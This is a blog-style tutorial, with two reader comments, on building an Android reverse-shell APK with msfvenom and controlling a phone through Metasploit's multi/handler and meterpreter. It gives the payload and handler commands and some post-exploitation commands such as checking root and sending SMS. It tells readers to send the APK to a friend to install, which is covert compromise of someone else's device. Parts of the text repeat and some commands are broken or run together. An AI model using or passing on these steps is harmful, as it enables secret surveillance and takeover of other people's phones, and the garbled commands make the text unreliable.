Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit
Hi Friends today in this article, we will learn how to hack or manipulate an android device and exploit it according to anyone’s desires.Android is an operating system based on Linux kernel.To install any application, it employs a file format based on the APK.We will thus also have APK-format malware.Use the following msfvenom commands to create the malware.
As the msfvenom malware is created, start the handler in order to have a session and for this type :command: msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=1234 R > /root/Desktop/Shell.apk
Service apache2 status (this command will help you to check your apache server is enable or not).
First you need to start your apache server. Command for starting is
root@kali:~# Service apache2 start
Now open the blank terminal or another terminal and type the command or we can say start a metasploit, for starting a metasploit the command is -
Now Write these commands at below:-
msf5 > use exploit/multi/handler
msf5 > set payload android/meterpreter/reverse_tcp
msf5 > set lhost
msf5 > set lport 1234
After writing this command send that APK file to your friend and install it.
After installing the .APK file write the command –
msf5 > exploit
Now, there are various commands to further exploit your victim’s device. We will show you practical of some of the major commands and all of these commands are shown in the image below :
You can check whether the device is rooted or not by using the following command :
meterpreter > check_rootsend
sms -d(put the victim phone number ) -t hacked and hit the enter.
And you can Do many more things usnig this.
Now in the next Blog Our Team Will tell You How to detect a these type malicious application in your mobile phone so be connected.
And you can Do many more things usnig this.
Now in the next Blog Our Team Will tell You How to detect a these type malicious application in your mobile phone so be connected.
Hope you enjoyed this. Keep connected.
Take Care
Stay Home Stay Safe
Take Care
Stay Home Stay Safe
govind from kerla nice and great stuff don't stop to write please
ReplyDeleteis it working . i don't have a kali linux so how do i perform this practical.